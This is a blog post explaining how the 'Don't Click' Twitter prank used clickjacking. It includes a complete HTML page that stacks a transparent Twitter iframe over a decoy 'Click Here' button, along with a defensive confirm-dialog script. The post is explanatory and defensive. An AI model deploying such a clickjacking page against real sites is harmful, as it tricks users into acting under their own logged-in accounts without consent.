How The “Don’t Click” Twitter Hack Works

I began to see "Don’t Click" posts appearing in my Twhirl client from a few different users. Then came the warnings not to click the links in those tweets, as doing so would tweet a "Don’t Click" from my own account. Being curious (and careful), I decided to figure out how this could work. First, I would like to recommend that you don’t follow my steps unless you know what you’re doing. This instance is relatively benign (annoying, but benign); the next instance could result in a virus or trojan infection.

After finding one of the "Don’t Click" links, I disabled JavaScript within Firefox. I was reasonably confident that this would prevent anything from running automatically. Next, I opened the link. Sure enough, a page opened up with a "Click Here" button. I examined the source code but didn’t see anything that would automatically post the tweet. I did notice an iFrame loading with a premade tweet, just as thinkgeek mentioned. I didn’t see how it would post the message to your tweet-stream, however.

At the bottom of the page was a credit for the source of the code, so (keeping JavaScript disabled) I decided to follow the link. That turned out to be a blog post written in French. A quick trip to Babelfish later, I was able to read the blog post. The translation wasn’t perfect, but it was good enough. So here’s how it goes:

  1. You see "Don’t Click" posted by one of your Twitter friends. Being the curious sort, you click on the link.
  2. The page that loads contains an iFrame. This iFrame loads the Twitter status page with another "Don’t Click" message pre-filled. So far, this isn’t a threat of any kind. Websites can do this all they want; the browser’s same-origin policy means the outer page can’t read or script the contents of the iFrame (beyond loading completely new contents into it). The website doesn’t have access to your Twitter username or password.
  3. The iFrame is set via CSS to be fully transparent. This means that it’s there and clickable, but you don’t actually see it.
  4. A "Click Here" button is shown and positioned (via CSS) directly underneath the spot where the invisible iFrame’s submit button sits.
  5. You, again being the curious sort, try to click the "Click Here" button.
  6. Instead of clicking "Click Here", your click lands on the Twitter submit button (stacked on top of the "Click Here" button but invisible to you).
  7. Because the iFrame is a real Twitter page loaded with your own session cookie, Twitter sees an ordinary click from a logged-in user and posts a "Don’t Click" message in your name.
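The page structure those seven steps describe, reconstructed as an added example (this is not the prank’s actual code or the French blog post’s code). The pixel offsets are hypothetical and would have to be tuned to the target’s layout; the `?status=` query parameter is assumed to be how Twitter’s pre-filled message feature was driven, and `example.com` stands in for the attacker’s own host. Note that nothing here needs JavaScript, which is why disabling it did not stop the page from working:

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Don't Click</title>
<style>
  /* The decoy button the victim believes they are clicking. */
  #decoy {
    position: absolute;
    top: 120px; left: 80px;       /* hypothetical: must sit exactly under the real submit button */
    width: 120px; height: 30px;
    z-index: 1;                   /* below the frame, so it never actually receives the click */
  }
  /* The framed Twitter page, stacked ON TOP of the decoy and fully transparent.
     Size and negative offsets are chosen so the hidden "update" button lands over #decoy. */
  #target {
    position: absolute;
    top: -300px; left: -400px;    /* hypothetical offsets, tuned per target layout */
    width: 900px; height: 600px;
    border: none;
    opacity: 0;                   /* invisible, yet still receives mouse clicks */
    filter: alpha(opacity=0);     /* same effect for legacy Internet Explorer */
    z-index: 2;                   /* above the decoy: the click goes to Twitter, not to #decoy */
  }
</style>
</head>
<body>
  <p>Don't Click</p>
  <button id="decoy">Click Here</button>

  <!-- Assumed: Twitter pre-fills the status box from a "status" query parameter.
       The browser attaches the victim's own Twitter session cookie to this request,
       so the framed page is already logged in as the victim; the attacker never
       sees or needs the victim's credentials. -->
  <iframe id="target" scrolling="no"
          src="http://twitter.com/home?status=Don't%20Click%3A%20http%3A%2F%2Fexample.com%2Fdontclick"></iframe>
</body>
</html>
```

The essential trick is the stacking order: the transparent frame has the higher `z-index`, so the decoy is purely visual. The attacker still needs the victim to perform both clicks, and cannot observe whether the second click landed on the right spot.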

It is quite clever, but it still requires two user actions. First, you need to click on the "Don’t Click" link. Next, you need to click on the "Click Here" button. This whole hack wouldn’t work if Twitter didn’t support pre-filled messages, but those pre-filled messages can come in handy from time to time. So what can Twitter do to prevent this? To be honest, I don’t know. They’ve said that they’re working on it, but (short of removing the "pre-filled message" functionality) this prank uses nothing beyond standard HTML/CSS. For now, though, the easiest way to prevent this is not to click on those links or, if you do, not to click the "Click Here" button on the page that loads.

Update: I actually did just think of something Twitter could do to stop this. The "Don’t Click" pranksters can’t see what’s going on when they attempt to get their tweet sent under their victim’s name. Twitter, however, can detect that a pre-filled message is about to be sent and can pop up a JavaScript prompt confirming the submission. The pranksters won’t be able to click on the "Ok, submit this" button in a JavaScript prompt, and the potential victim will (hopefully) cancel the message and leave.
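What that proposed check could look like on Twitter’s side of the iFrame, written as an added example rather than anything Twitter actually shipped. The form markup, the `status` query parameter and the `/status/update` action are all assumptions made for the illustration:

```html
<!-- Hypothetical status form as it would appear on the framed Twitter page.
     This script runs inside the frame, in Twitter's origin, so the attacker's
     outer page can neither read nor alter it. -->
<form id="status_form" action="/status/update" method="post">
  <textarea id="status" name="status"></textarea>
  <input type="submit" value="update">
</form>
<script>
  (function () {
    // Assumed: the pre-filled message arrives as ?status=... in the query string.
    var prefilled = null;
    var params = window.location.search.substring(1).split('&');
    for (var i = 0; i < params.length; i++) {
      var pair = params[i].split('=');
      if (decodeURIComponent(pair[0]) === 'status') {
        prefilled = decodeURIComponent((pair[1] || '').replace(/\+/g, ' '));
      }
    }

    var form = document.getElementById('status_form');
    var box = document.getElementById('status');

    if (prefilled !== null) {
      box.value = prefilled;
      // A native confirm() dialog is drawn by the browser, outside the page's
      // layout, so a transparent overlay cannot cover it and a hijacked click
      // cannot press its OK button. Returning false cancels the submission.
      form.onsubmit = function () {
        return window.confirm(
          'Another site pre-filled this message for you:\n\n"' + box.value +
          '"\n\nPost it to your timeline?'
        );
      };
    }
  })();
</script>
```

The dialog must quote the full message, since the victim has seen nothing but "Click Here" up to this point. It only fires when the status was pre-filled, so ordinary typed tweets are unaffected; it still depends on the victim reading the prompt and pressing Cancel.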